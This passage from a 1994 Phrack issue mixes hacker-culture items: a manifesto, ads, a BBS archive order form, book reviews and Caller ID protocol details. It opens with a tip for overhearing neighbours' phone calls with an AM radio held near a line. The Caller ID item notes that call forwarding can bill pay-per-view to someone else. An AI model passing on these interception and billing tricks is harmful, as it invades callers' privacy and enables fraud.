our beloved phone company British Telecom, even the private phone companies have to rent their lines off BT. BUT, due to something or other I don't entirely understand here's how to listen in to phone conversations with a personal stereo. I was lying in bed one night trying desperately to read my book, while everyone else was making enough noise to wake the dead. So, I thought, I'll put personal stereo radio onto some radio crackle to cut out everything else. I was happily reading for a while when suddenly the radio crackle was interrupted by 'ring ring, ring ring, 'ello Jon, going into work tomorrow ? Good, how's the wife.... etc etc' Fuck me ! A telephone conversation. After a bit of investigating I discovered my bed lies next to where the telephone line goes thru the wall. What I did was to tune the radio into an AM frequency, as far to the right (past 1600 kHz) as possible. This works on my personal stereo, a Sharp, model JC-512(GY), my clock radio and my mates pocket radio, but not on some other radios we've tried. It picks up local telephone calls (if there are any strong enough to be picked up) when the radio is put near a telephone socket or line (the closer the better). Computer monitors and TV's give loads of interference (try putting your the radio near one when tuned to listen for phones) so keep away from them. You can't choose what calls to listen in on, and some may be blurred beyond recognition, while others are crystal clear. Also, strangely enough if someone in the house uses the phone while your listening to conversations it doesn't effect it in any way, and you can't hear the call currently on the line. Not being an electronics hacker I can only assume it is to do with the frequency of radio waves given off by electrical devices after a certain distance travelled. But then again maybe not. This may work in other places apart from the UK as well, give it a try ! ==Phrack Magazine== Volume Five, Issue Forty-Five, File 6 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART III ------------------------------------------------------------------------------ ** SUBMISSIONS WANTED ON THE FOLLOWING TOPICS FOR FUTURE ISSUES ** Cable Television Descrambling PBX Data Terminal Files Van Eck Eavesdroping Security & Anti-Security Measures (Computers, Networks, Physical Sites) Satellite Transmissions (Audio, Video, DATA, Telecommunications) Amateur Radio & Television Radio Modification Instructions Electronics Project Schematics X.25 Networking / X.29 Pad Control Digital Cellular (GSM/TDMA/CDMA) Wireless Data Networking (LAN, WAN) ** REMEMBER: Send your university dialups to phrack@well.com ASAP! ** ------------------------------------------------------------------------------ A Declaration of the Complaints and Grievances of the United States Electronic Community -- "They that can give up essential liberty for a little temporary safety deserve neither liberty nor safety!" These are Benjamin Franklin's words for one of the most important values defining American Government in it's infancy. This idea, that people should be given as much freedom as possible, and also responsibility for what problems abuse of that freedom might bring, is one of the most important differences between our so called "Democracy," and a totalitarian despotism. In fact, this value is so essential that if it is lost there will be no freedom in the United States of America, and no so called "Democracy!" Despite this fact, every day more and more of our freedoms, as citizens and residents of the United States of America, are being eroded away in the name of safety for us and for our government. This erosion of rights and freedoms has touched all areas of our lives, from health care and economics, to criminal justice and national defense. However, the most profound and dangerous erosion has been in the area of technology. We believe this is as good a place as any to begin a fight to save our country from continuing to travel down the road to despotism. Do not forget that this is only a beginning. We, the people of the Electronic Community in the United States of America, have been openly repressed and attacked by all branches and divisions of the United States Government, in direct violation of our natural rights and rights granted to us via social contract! The Electronic Community is one of the world's greatest examples of the power of freedom and democracy. Most of Cyberspace was not created by businesses looking for profit, or by governments looking for more efficient control, but mainly by ordinary citizens looking for a medium through which they could communicate with others, and express their thoughts and ideas. The computerized telecommunications used by the electronic community is a medium unlike any that has ever existed. It is a decentralized, mostly uncensored, and public forum for open discussion on a world wide basis. It provides ordinary citizens with the ability to express their ideas to anyone willing to listen, with no economic or social barriers and no prejudgments. It gives everyone in the world access to all the knowledge and information the world has to offer. It has continually shattered deeply ingrained social prejudices concerning characteristics such as age, race, wealth, and sex. In fact, it is common to find 14 year olds arguing philosophy with 41 year olds on America's computer networks! However, instead of embracing this great tool of freedom, the United States Government has reacted to it with fear and ignorance. They have completely ignored the positive effects the existence of this resource is already having on society. In fact, they have done little, if anything, to even gain an understanding of the electronic community and it's citizens. They have thought only of the damage that could be wrought if access to this kind of knowledge and information fell into the "wrong hands." They have labeled everyone in the electronic community a potential criminal, and have cracked down on any kind of activity which has not met their standards. In doing so they have crushed the free flow of ideas, trampled on the constitution, and blatantly encroached upon the civil rights of the people living and working on American's computer networks. They have chosen safety above freedom, and in doing so they have threatened the existence of one of the most important social developments of the twentieth century... They have ensued upon a Campaign of Terror, using fear to control and oppress the Electronic Community. They have openly and blatantly violated local, state, and federal law, and internationally accepted standards for human rights. They have used misinformation to set certain areas of the electronic community off against one another, or to label certain areas as criminal, while they have attacked the entire community without regard to action or position. They have lied to the press, to themselves, and to the American people in order to keep their actions unquestioned. They have imposed taxes and tariffs and have priced public utilities with the specific intent of effecting a chill upon the free flow of thoughts and ideas. They have used technology to amass enormous amounts of information on innocent citizens in order to control and oppress them. They have judged the interests of private industry to be more important than the interests of the general population. They have attacked innocent citizens in order to increase the profits of certain industries. They have declared themselves immune from the legal and moral standards they expect from the rest of society. They have, on a regular basis, committed the very acts they have called criminal. They have tried to criminalize personal privacy while belligerently defending the privacy of businesses and of government. They have attempted to control the minds of the American people by criminalizing certain knowledge and information. They have prevented the preparation of thoughts and ideas for public dissemination. They have threatened innocent citizens with loss of their right to life, liberty, property, and the pursuit of happiness in order to control their thoughts, opinions, and actions. They have repeatedly made laws and taken legal action in areas and/or concerning subjects of which they have little or no understanding. They have seized, damaged, and destroyed the property of innocent citizens. They have wrongly imprisoned citizens based on questionable information for actions which are negligible and, at worst, legally gray. They have directly attacked innocent citizens in order to keep them from publicly assembling. They have spied on and attempted to interfere with the private communications of innocent citizens. They have made unreasonable and excessive searches and seizures. They have punished innocent citizens without trial. They have attempted to effect a chill on the free flow of thoughts and ideas. They have affected to render the government independent of and superior to the people. We cannot, we WILL not, allow this tyranny to continue! The United States Government has ignored the voice of the Electronic Community long enough! When we told the government that what they were doing was wrong, they refused to listen! When we formed political action groups to bring our cases to court and before Congress, we were told that we were using loopholes in the law to get away with crime!!! We have, in a peaceful and respectful manner, given our government more than reasonable petition for redress of our grievances, but if anything the situation has gotten worse! Government administrations use computer crime as a weapon in internal battles over jurisdiction. Government officials, who have only the slightest understanding of computer science, use computer crime as a tool for career success. Elected Representatives, who have absolutely no understanding of computers, use "information superhighways", computer crime, and cryptography to gain constituent money and voter support! The Electronic Community, the only group who fully understands the issues involved here, and the only group who is effected by the decisions being made, has been completely ignored! We have sat around and discussed these wrongs long enough! NOW IS THE TIME TO STAND UP AND DEMAND A REDRESS OF OUR GRIEVANCES BY ANY AND ALL MEANS AVAILABLE! We must scream the truth so loudly that we drown out everything else! We must save our small community from destruction so that when the rest of society is ready, the world will still have a forum for free speech and open communication. We must demand freedom for America's Electronic Community!!! Tom Cross AKA The White Ninja TWN615@Phantom.Com NOTE: Redistribution and further publishing of this document is highly encouraged as long as proper credit is given. ------------------------- ------------------------- "Government is not a reason, not an eloquence; ------------------------- it is a force. Like fire, it is a dangerous --------------- * * * * * servant and a fearful master." --------------- * * * * * --------------- * * * * * -- George Washington --------------- * * * * * ------------------------------------------------------------------------------ THE JOURNAL OF AMERICAN UNDERGROUND COMPUTING / Published Quarterly ======================================================================== ISSN 1074-3111 Technology, Conspiracy, Editorials, Politics, Networking ======================================================================== Editor-in-Chief: Scott Davis NetSurfer: John Logan It's A Conspiracy!: Gordon Fagan E-Mail - editors@fennec.com ** ftp site: etext.archive.umich.edu /pub/Zines/JAUC U.S. Mail: The Journal Of American Underground Computing 10111 N. Lamar #25 Austin, Texas 78753 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% To Subscribe to "TJOAUC", send mail to: sub@fennec.com All questions/comments about this publication to: comments@fennec.com Send all articles/info that you want published to: submit@fennec.com Commercial Registration for Profitable Media: form1@fennec.com "The underground press serves as the only effective counter to a growing power, and more sophisticated techniques used by establishment mass media to falsify, misrepresent, misquote, rule out of consideration as a priori ridiculous, or simply ignore and blot out of existence: data, books, discoveries that they consider prejudicial to establishment interest..." (William S. Burroughs and Daniel Odier, "The Job", Viking, New York, 1989) ------------------------------------------------------------------------------ New TimeWasters T-shirts ! Do you know the feeling ? You're behind your terminal for hours, browsing the directories of your school's UNIX system. Instead of holes, bugs and bad file permissions you find tripwire, TCPwrapper and s/key. You run a file with a s-bit and immediately you get a mail from the system admin asking what you are doing. In other words, no chance to ever become a good hacker there. Now you have the chance to at least pretend to be an eleet hacker. The Dutch hacking fanatics The TimeWasters have released the third version of their cool 'hacker' T-shirt. Because the previous versions were too limited (20 and 25 shirts) we printed no less than 200 shirts this time. Of course you want to know, what does it look like ? On the front, a TimeWasters logo in color. Below that a picture of two hacking dudes, hanging behind their equipment, also featuring a stack of phracks, pizza boxes, beer, kodez, and various computer-related stuff with a 'No WsWietse' sticker. On the back, the original TimeWasters logo with the broken clock. Below it, four original and dead funny real quotes featuring the art of Time Wasting. Wearing this shirt can only provoke one reaction; WOW ! Imagine going up to the helpdesk wearing this shirt and keeping a straight face while asking a security question ! And for just $2 more you'll get a pair of sunglasses with the text 'TimeWasters' on them ! To order: Send $20 or $22 to TimeWasters Postbus 402 5611 AK Eindhoven The Netherlands, Europe This includes shipping. Please allow some time for delivery. If you are in Holland, don't send US$, email the address below for the price in guilders and our 'postbank' number. For more information: email to: - timewasters-request@win.tue.nl with subject: T-SHIRT for a txtfile with more info. - rob@hacktic.nl or gigawalt@win.tue.nl for questions. Written by Rob J. Nauta, rob@hacktic.nl dd. 8 mar 1994 ------------------------------------------------------------------------------ Caller ID Technical Details by Hyperborean Menace The way Caller ID works internally is through SS7 (Signalling System 7) messages between telephone switches equipped to handle SS7. These messages pass all the call information (block/no block, calling number, etc.). The calling number is sent as part of the SS7 call setup data on all SS7 routed calls (i.e. all calls carried between switches that are SS7 connected). The calling number is sent between switches always, regardless of whether or not *67 (Caller ID Block) is dialed. It just sends along a privacy indicator if you dial *67, and then the final switch in the path will send a "P" instead of the calling number to the Caller ID box. (But it will still store the actual number - *69 will work whether or not the caller dialed *67). What the final switch along the path does with the calling number depends on how the switch is configured. If you are not paying for Caller ID service, the switch is configured so that it will not transmit the Caller ID data. This is entirely separate from Automatic Number Identification, which is sent along SS7 where SS7 is available, but can also be sent using other methods, so that ALL switches (for many years now) have been able to send ANI (which is what Long Distance companies used to know who to bill). Enhanced 911 is NOT based on Caller ID, but on ANI, thus, it will work for anyone, not just people connected to SS7 capable switches. And, of course, *67 will have no effect on Enhanced 911 either. Also interesting is the effect call forwarding has on the various services. Say I have my home telephone forwarded to Lunatic Labs, and it has Caller ID. If you call me, the call will forward to Lunatic Labs, and its Caller ID box will show YOUR number, not mine (since your line is the actual one making the call). However, ANI is based on the Billing Number (who is paying for the call (or would pay if it weren't free), not on who is actually making the call. Thus, if I forward my telephone to an 800 Number that gets ANI (such as the cable pay-per-view order number), and you call me, they will get MY number (since I would be the one paying for that portion of the call, except that 800 Numbers are free), and you will end up ordering pay-per-view for me... CNID (Caller ID) Technical Specifications PARAMETERS The data signalling interface has the following characteristics: Link Type: 2-wire, simplex Transmission Scheme: Analog, phase-coherent FSK Logical 1 (mark) 1200 +/- 12 Hz Logical 0 (space) 2200 +/- 22 Hz Transmission Rate: 1200 bps Transmission Level: 13.5 +/- dBm into 900 ohm load (I have copied this data as presented. I believe the transmission level is meant to be -13.5 dBm.) [It is indeed -13.5 dBm] PROTOCOL The protocol uses 8-bit data words (bytes), each bounded by a start bit and a stop bit. The CND message uses the Single Data Message format shown below. [ I belive this is the same as standard asynchronous serial - I think the start bit is a "space", and the stop bit is a "mark" ] Channel Carrier Message Message Data Checksum Seizure Signal Type Length Word(s) Word Signal Word Word CHANNEL SEIZURE SIGNAL The channel seizure is 30 continuous bytes of 55h (01010101) providing a detectable alternating function to the CPE (i.e. the modem data pump). [CPE = Customer Premises Equipment --i.e. your Caller ID Box] CARRIER SIGNAL The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to condition the receiver for data. MESSAGE TYPE WORD The message type word indicates the service and capability associated with the data message. The message type word for CND is 04h (00000100). MESSAGE LENGTH WORD The message length word specifies the total number of data words to follow. DATA WORDS The data words are encoded in ASCII and represent the following information: o The first two words represent the month o The next two words represent the day of the month o The next two words represent the hour in local military time o The next two words represent the minute after the hour o The calling party's directory number is represented by the remaining words in the data word field If the calling party's directory number is not available to the terminating central office, the data word field contains an ASCII "O". If the calling party invokes the privacy capability, the data word field contains an ASCII "P". [ Note that 'O' will generally result in the Caller-ID box displaying "Out Of Area" indicating that somewhere along the path the call took from its source to its destination, there was a connection that did not pass the Caller ID data. Generally, anything out of Southwestern Bell's area will certainly generate a 'O', and some areas in SWB territory might also not have the SS7 connections required for Caller ID] CHECKSUM WORD The Checksum Word contains the twos complement of the modulo 256 sum of the other words in the data message (i.e., message type, message length, and data words). The receiving equipment may calculate the modulo 256 sum of the received words and add this sum to the received checksum word. A result of zero generally indicates that the message was correctly received. Message retransmission is not supported. EXAMPLE CND SINGLE DATA MESSAGE An example of a received CND message, beginning with the message type word, follows: 04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51 04h= Calling number delivery information code (message type word) 12h= 18 decimal; Number of data words (date, time, and directory number words) ASCII 30,39= 09; September ASCII 33,30= 30; 30th day ASCII 31,32= 12; 12:00 PM ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM) ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling party's directory number 51h= Checksum Word [ There is also a Caller Name service that will transmit the number and the name of the caller. The basic specs are the same as just numbers, but more data is transmitted. I don't have the details of the data stream for that.] DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS To receive CND information, the modem monitors the phone line between the first and second ring bursts without causing the DAA to go off hook in the conventional sense, which would inhibit the transmission of CND by the local central office. A simple modification to an existing DAA circuit easily accomplishes the task. [i.e. The Caller-ID Device should present a high impedance to the line] MODEM REQUIREMENTS Although the data signalling interface parameters match those of a Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A V.23 1200 bps modem receiver may be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used on a modem to indicate when to monitor the phone line for CND information. After the RI bit sets, indicating the first ring burst, the host waits for the RI bit to reset. The host then configures the modem to monitor the phone line for CND information. According to Bellcore specifications, CND signalling starts as early as 300 mS after the first ring burst and ends at least 475 mS before the second ring burst. ------------------------------------------------------------------------------ Country Percentage of Piracy -------------------------------------------------------- Australia / New Zealand 45% Benelux 66 France 73 Germany 62 Italy 86 Japan 92 Korea 82 Singapore 41 Spain 86 Sweden 60 Taiwan ( 1990 ) 93 Thailand 99 United Kingdom 54 United States 35 Source: Business Software Alliance, based on 1992 h/w & s/w shipping figures ------------------------------------------------------------------------------ The Frog Farm Mailing List FAQ v1.1 January 20th, 1994 1. What is this I am reading? 2. What is the Frog Farm? 3. Okay, so what's the Frog Farm mailing list? 4. Are there any rules enforced on the mailing list? 5. I can see all the addresses of the subscribers! 6. You must be Nazis. After all, aren't people who hate Jews, blacks, etc., the only people who talk about this sort of thing? 1. What is this I am reading? This is the FAQ for the Frog Farm mailing list. It is NOT the FAQ for the Frog Farm. The FAQ for the Frog Farm is much larger (just over 100 Kbytes in size). 2. What is the Frog Farm? Read the FAQ. You can FTP it from etext.archive.umich.edu in the /pub/Legal/FrogFarm directory (also accessible via Gopher). If you do not have FTP access, you may request the FAQ via e-mail from schirado@lab.cc.wmich.edu. 3. Okay, so what's the Frog Farm mailing list? frog-farm@blizzard.lcs.mit.edu is an unmoderated e-mail forum devoted to the discussion of claiming, exercising and defending Rights in America, past, present and future. Topics include, but are not limited to, conflicts which can arise between a free people and their public servants when said servants exceed the scope of their powers, and possible methods of dealing with such conflicts. To subscribe to the list, send a message containing the single line: ADD to frog-farm-request@blizzard.lcs.mit.edu. To remove your subscription from the forum, send a message containing the single line: REMOVE to frog-farm-request@blizzard.lcs.mit.edu. Note that these commands must be in the BODY of the message; the contents of the Subject line are ignored. While you are subscribed, send mail to frog-farm@blizzard.lcs.mit.edu to echo your message to all other list subscribers. 4. Are there any rules enforced on the mailing list? Only two: 1) Do not reveal the e-mail addresses of any subscribers to any individuals who are not subscribers. You may freely redistribute any article posted to the Frog Farm, subject to whatever conditions the poster may have placed on it. For example, some people attach a notice to their message stating that they are NOT allowing the redistribution of their message under ANY circumstances, some people stipulate that it may be redistributed only if it is unaltered in any way, etc. 2) No flaming is permitted. The list maintainers are the sole judges of what constitutes flaming. 5. I can see all the addresses of the subscribers! Under normal circumstances, you can't see the names. If you can, you had to work at it; if so, you obviously know what you're doing, and you should have known better. Try not to let your curiosity overwhelm your respect for the privacy of others. The security on this list is not as tight as it could be, and it is a trivial process for a knowledgeable hacker or hackers to circumvent it. If you know how to do this, please don't do it. 6. You must be Nazis. After all, aren't people who hate Jews, blacks, etc., the only people who talk about this sort of thing? Not at all. The official position of the Frog Farm is that every human being, of any sex or race, has "certain inalienable Rights" which may not be violated for any cause or reason. Anyone may claim and exercise Rights in America, providing they possess the necessary courage and mental competence. The Frog Farm provides a List of Interesting Organizations to its subscribers, which may include organizations or persons who believe in a god or gods, or promote the idea that certain races are inferior or perhaps part of a conspiratorial plot to enslave everyone else. The list maintainers make every effort to note such idiotic beliefs, where they exist, and encourage people not to throw out the baby with the bathwater, but to seek the truth wherever it may be found. Every individual is unique, and none may be judged by anything other than their words and actions. ------------------------------------------------------------------------------ The LOD Communications Underground H/P BBS Message Base Project: Information/Order File: Brief Version 2/17/94 This is a short version of the longer, 35K (12 page) Order/Info file. If you want the full file, sample message file, detailed tables of contents file, etc. you can request it from lodcom@mindvox.phantom.com or choose menu item #5 on the Mindvox Gopher Server by using any gopher and opening a connection with the hostname: mindvox. The Project: ------------ Throughout history, physical objects have been preserved for posterity for the benefit of the next generation of humans. Cyberspace, however, isn't very physical; data contained on floppy diskettes has a finite lifetime as does the technology to retrieve that data. The earliest underground hacker bulletin board systems operated at a time when TRS-80s, Commodore 64s, and Apple ][s were state-of-the-art. Today, it is difficult to find anyone who has one of these machines in operating condition, not to mention the brain cells left to recall how to operate them. :-( LOD Communications has created a historical library of the "dark" portion of Cyberspace. The project's goal is to acquire as much information as possible from underground Hack/Phreak (H/P) bulletin boards that were in operation during a decade long period, dating from the beginnings (in 1980/81 with 8BBS and MOM: Modem Over Manhattan) to the legendary OSUNY, Plover-NET, Legion of Doom!, Metal Shop, etc. up through the Phoenix Project circa 1989/90. Currently, messages from over 75 different BBSes have been retrieved, although very few message bases are 100% complete. However, not having a complete "set" does not diminish their value. DONATIONS: A portion of every order will be donated to the following causes: 1) A donation will be made to help pay for Craig Neidorf's (Knight Lightning - Metal Shop Private Co-Sysop) Legal Defense bills (resulting from his successful campaign to protect First Amendment rights for electronic publishing, i.e. the PHRACK/E911 case). 2) The SotMESC Scholarship Fund. The SotMESC Scholarship is awarded to students writing exceptional papers of 20 to 30 pages on a topic based on computer culture (ie, hacking culture, virus writing culture, Internet culture, etc.) For more details write: SotMESC PO BOX 573 Long Beach, MS 39560 or email: rejones@seabass.st.usm.edu NOTE: THE FIRST DONATIONS TO EACH OF THE ABOVE TWO CAUSES HAVE ALREADY BEEN MADE. What Each "Message Base File" Contains: --------------------------------------- - A two page general message explaining H/P BBS terminology and format. - The BBS Pro-Phile: A historical background and description of the BBS either written by the original system operator(s) or those who actually called the BBS when it was in operation (it took months to track the appropriate people down and get them to write these specifically for this project; lesser known BBSes may not contain a Pro-Phile); - Messages posted to the BBS (i.e. the Message Base); - Downloaded Userlists if available; and - Hacking tutorials a.k.a. "G-Philes" that were on-line if available. It is anticipated that most people who are interested in the message bases have never heard of a lot of the BBS names shown in the listing. If you have seen one set of messages, you have NOT seen them ALL. Each system had a unique personality, set of users, and each has something different to offer. Formats the Message Base Files are Available in: ------------------------------------------------ Due to the large size of the Message Base Files, they will be compressed using the format of your choice. Please note that Lodcom does NOT include the compression/uncompression program (PKZIP, PAK, MAC Stuffit, etc.). ASCII (uncompressed) files will be provided for $5.00 extra to cover additional diskette (files that are uncompressed require more than double the number of diskettes) and shipping costs. The files are available for: - IBM (5.25 or 3.5 inch) - APPLE MACINTOSH (3.5 inch) - ATARI ST (MS-DOS Compatible 3.5 inch) - AMIGA (3.5 inch) - PAPER versions can be ordered but cost triple (due to increased costs to ship, time to print, and messages being in 40 column format which wastes lots of paper...save those trees!). Paper versions take twice the time to deliver but are laser printed. Orders are expected to arrive at the requesters' physical mail box in 3-5 weeks upon receipt of the order. The Collection: --------------- This is where we currently stand as far as what has been completed and the estimated completion dates for the rest of the project: Volume 1: 5700+ Messages, 20 H/P BBSes, COMPLETED. Volume 2: 2100+ Messages, 25 H/P BBSes, COMPLETED. Volume 3: 20-30 H/P BBSes, End of March 1994. Volume 4: ????? H/P BBSes, Sometime after 3/94. All in all there is expected to be 12000+ Messages. NOTE: Additional material has recently been received for Boards already released in the first 2 volumes. Those who have already ordered will receive the updated versions with the additional messages that have been recovered. *** Blurbs and Excerpts: *** ---------------------------- Blurbs from some of those who have received the first two Volumes: "I am stunned at the quality of this undertaking. It brought back that feeling of involvement and interest." --P.P. "I think of the release of the H/P Message Bases as an opening salvo in the battle for the truth about fraud in the Telecom Industry." --J.J. "Still sifting through Volume one. For now I've taken the approach of putting all the files into one subdirectory and searching it for topics of interest. Prime and Primos computers was my first topic of interest and Volume I yielded quite a bit of odd and useful information." --K.B. "...the professionalism of the Message Bases is of a superior quality. Somehow they bring back that age of innocence. Boy do I miss those times." --A.C. Excerpt from 2600 Magazine (The Hacker Quarterly) Autumn 1993 Issue, review by Emmanuel Goldstein entitled NEVER ERASE THE PAST. "...is this the sort of thing that people really care about? Undoubtedly, many will shrug it off as useless, boring teenagers that have absolutely no relevance to anything in the real world. The fact remains, however, that this is history. This is *our* history, or at least, a small part of it. The boards included in this project - Sherwood Forest I & II, Metal Shop Private, OSUNY, Phoenix Project, and a host of others - are among the more interesting hacker boards, with some classic dialogue and a gang of hacker stars-to-be. Nearly all of these boards were raided at one time or another, which makes it all even more fascinating." "Had the LODCOM project not come along when it did, a great many of these message bases probably would have been lost forever. Providing this service to both the hacker community and those interested in it is a noble cause that is well worth the price. If it succeeds, some valuable hacker data will be preserved for future generations." The Lodcom project was also reviewed in Computer underground Digest Issue #5.39 and will be reviewed by GRAY AREAS MAGAZINE in their summer issue. You should be able to find the issue on most newsstands in about 3 months. You can contact Gray Areas by phone: 215-353-8238 (A machine screens their calls), by email: grayarea@well.sf.ca.us, and by regular mail: Gray Areas, Inc. , PO BOX 808, Broomall, PA 19008-0808. Subscriptions are $18.00 a year U.S. and we highly recommend the magazine if you are interested in the gray areas of life. *** {End of Blurbs and Excerpts} *** Volume 1 & 2 Table of Contents: ------------------------------- A detailed Table of Contents file can be found on the Mindvox Gopher Server or requested via email. Project Contributor List: ------------------------- The following is a list (order is random) of those who helped with this effort that began in Jan. of 1993. Whether they donated material, uploaded messages, typed messages from printouts, critiqued our various materials, wrote BBS Pro-Philes, donated services or equipment, or merely 'looked in their attic for some old disks', their help is appreciated: Lord Digital and Dead Lord (Phantom Access Technologies/The MINDVOX System), 2600 Magazine/Emmanuel Goldstein, The Marauder, Knight Lightning, T.B., Computer underground Digest (CuD)/Jim Thomas/Gordon Meyer, Phrack Magazine, Strat, Jester Sluggo, Erik Bloodaxe, Taran King, Professor Falken, TUC, Lex Luthor, Mark Tabas, Phantom Phreaker, Quasi Moto, The Mechanic, Al Capone, Compu-Phreak, Dr. Nibblemaster, King Blotto, Randy Hoops, Sir Francis Drake, Digital Logic, The Ronz, Doctor Who, The Jinx, Boca Bandit, Crimson Death, Doc Holiday, The Butler, Ninja Master, Silver Spy, Power Spike, Karl Marx, Blue Archer, Dean Simmons, Control-C, Bad Subscript, Swamp Ratte, Randy Smith, Terminal Man, SK Erickson, Slave Driver, R.E.Jones/CSP/SotMESC, Gray Areas Magazine, and anonymous others. The Order Form: --------------- - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - LOD Communications H/P BBS Message Base ORDER FORM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PERSONAL RATE: Volumes 1, 2, 3, and possibly a fourth if created: $39.00 This price is TOTAL & includes any updates to individual BBS Message Bases. COMMERCIAL RATE: Corporations, Universities, Libraries, and Government Agencies: $99.00 As above, price is total and includes updates. H/P BBS Message Bases (All Volumes): $________ "G-Phile" Collection (Optional): $____________ ($10.00 Personal) ($25.00 Commercial) Disk Format/Type of Computer: _____________________________________ (Please be sure to specify diskette size [5.25" or 3.5"] and high/low density) File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________ (ASCII [Non-Compressed] add $5.00 to order) Texas Residents add 8% Sales Tax. If outside North America please add $6.00 for Shipping & Handling. Total Amount (In U.S. Dollars): $ ___________ Payment Method: Check or Money Order please, made out to LOD Communications. Absolutely NO Credit Cards, even if it's yours :-) By purchasing these works, the Purchaser agrees to abide by all applicable U.S. Copyright Laws to not distribute or reproduce, electronically or otherwise, in part or in whole, any part of the Work(s) without express written permission from LOD Communications. Send To: Name: _____________________________________ Organization: _____________________________________ (If applicable) Street: _____________________________________ City/State/Zip: _____________________________________ Country: _____________________________________ E-mail address: _____________________________________ (If applicable) PRIVACY NOTICE: The information provided to LOD Communications is used for sending orders and periodic updates to the H/P BBS Message Base Price List. It will NOT be given or sold to any other party. Period. - - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - - Remit To: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 Lodcom can also be contacted via E-mail: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 _____________________________________________________________________________ End Brief Version of Order/Info File (2/20/94) Email: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 Snail Mail: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 ------------------------------------------------------------------------------ BooX for Hackers ================ by Seven Up Usually I am not reading too many books. But there are two rather new ones everyone should read and have. UNIX Power Tools ================ The first one is made for people who like to play with UNIX. It is called 'UNIX Power Tools', published by Bantam and O'Reilly. It contains over 1000 pages and weighs about 3 pounds, but contains a CD ROM. It contains pretty useful information and examples on how to use standard UNIX utilities and how to solve certain tasks. Some of the topics it covers are: Encryption of passwords, shell programming, config files for logging in and out, setting shell prompts, vi tips & tricks, redirecting and piping, sed & awk and much more. Like most O'Reilly books, it is written with a lot of humor and easy to read. To me, this book is a reference for almost any question. You might even feel that you don't need most of your old UNIX books anymore, because this book almost covers it all. It is also a lot of fun just to browse through the book randomly and read articles on different subjects. There really is no need and no use to read it from A to Z. A lot of their tricks is collected from Usenet Newsgroups. All of their use- ful programs, scripts and general PD programs you will find on FTP sites are on the CD. However, if you want a different medium they charge you $40. And now we come to the only problem of the book: the price! I think compared to the contents, charging $59.95 is justified; but it might scare off many people anyway. Finally I would recommend this book to everyone who uses UNIX a lot and likes to experiment and play with it (and has 60 bucks left). Hacker Crackdown ================ Now reading Bruce's book won't cost you 60 bucks. In fact, it will even be totally FREE! I won't say too much about the book, because there have already been great reviews in Phrack and 2600 in Spring/Summer 1993. It is probably the most interesting and entertaining book about Hackers and Fedz from 1993. But now Bruce decided to release the book as online freeware - you may just grab the 270k file from a site, read it and give it to anyone you want. But let's listen to Bruce now and what he has to say... January 1, 1994 -- Austin, Texas Hi, I'm Bruce Sterling, the author of this electronic book. Out in the traditional world of print, *The Hacker Crackdown* is ISBN 0-553-08058-X, and is formally catalogued by the Library of Congress as "1. Computer crimes -- United States. 2. Telephone -- United States -- Corrupt practices. 3. Programming (Electronic computers) -- United States -- Corrupt practices." 'Corrupt practices,' I always get a kick out of that description. Librarians are very ingenious people. The paperback is ISBN 0-553-56370-X. If you go and buy a print version of *The Hacker Crackdown,* an action I encourage heartily, you may notice that in the front of the book, beneath the copyright notice -- "Copyright (C) 1992 by Bruce Sterling" -- it has this little block of printed legal boilerplate from the publisher. It says, and I quote: "No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage and retrieval system, without permission in writing from the publisher. For information address: Bantam Books." This is a pretty good disclaimer, as such disclaimers go. I collect intellectual-property disclaimers, and I've seen dozens of them, and this one is at least pretty straightforward. In this narrow and particular case, however, it isn't quite accurate. Bantam Books puts that disclaimer on every book they publish, but Bantam Books does not, in fact, own the electronic rights to this book. I do, because of certain extensive contract maneuvering my agent and I went through before this book was written. I want to give those electronic publishing rights away through certain not-for-profit channels, and I've convinced Bantam that this is a good idea. Since Bantam has seen fit to peaceably agree to this scheme of mine, Bantam Books is not going to fuss about this. Provided you don't try to sell the book, they are not going to bother you for what you do with the electronic copy of this book. If you want to check this out personally, you can ask them; they're at 1540 Broadway NY NY 10036. However, if you were so foolish as to print this book and start retailing it for money in violation of my copyright and the commercial interests of Bantam Books, then Bantam, a part of the gigantic Bertelsmann multinational publishing combine, would roust some of their heavy-duty attorneys out of hibernation and crush you like a bug. This is only to be expected. I didn't write this book so that you could make money out of it. If anybody is gonna make money out of this book, it's gonna be me and my publisher. My publisher deserves to make money out of this book. Not only did the folks at Bantam Books commission me to write the book, and pay me a hefty sum to do so, but they bravely printed, in text, an electronic document the reproduction of which was once alleged to be a federal felony. Bantam Books and their numerous attorneys were very brave and forthright about this book. Furthermore, my former editor at Bantam Books, Betsy Mitchell, genuinely cared about this project, and worked hard on it, and had a lot of wise things to say about the manuscript. Betsy deserves genuine credit for this book, credit that editors too rarely get. The critics were very kind to *The Hacker Crackdown,* and commercially the book has done well. On the other hand, I didn't write this book in order to squeeze every last nickel and dime out of the mitts of impoverished sixteen-year-old cyberpunk high-school-students. Teenagers don't have any money -- (no, not even enough for the six- dollar *Hacker Crackdown* paperback, with its attractive bright-red cover and useful index). That's a major reason why teenagers sometimes succumb to the temptation to do things they shouldn't, such as swiping my books out of libraries. Kids: this one is all yours, all right? Go give the print version back. *8-) Well-meaning, public-spirited civil libertarians don't have much money, either. And it seems almost criminal to snatch cash out of the hands of America's direly underpaid electronic law enforcement community. If you're a computer cop, a hacker, or an electronic civil liberties 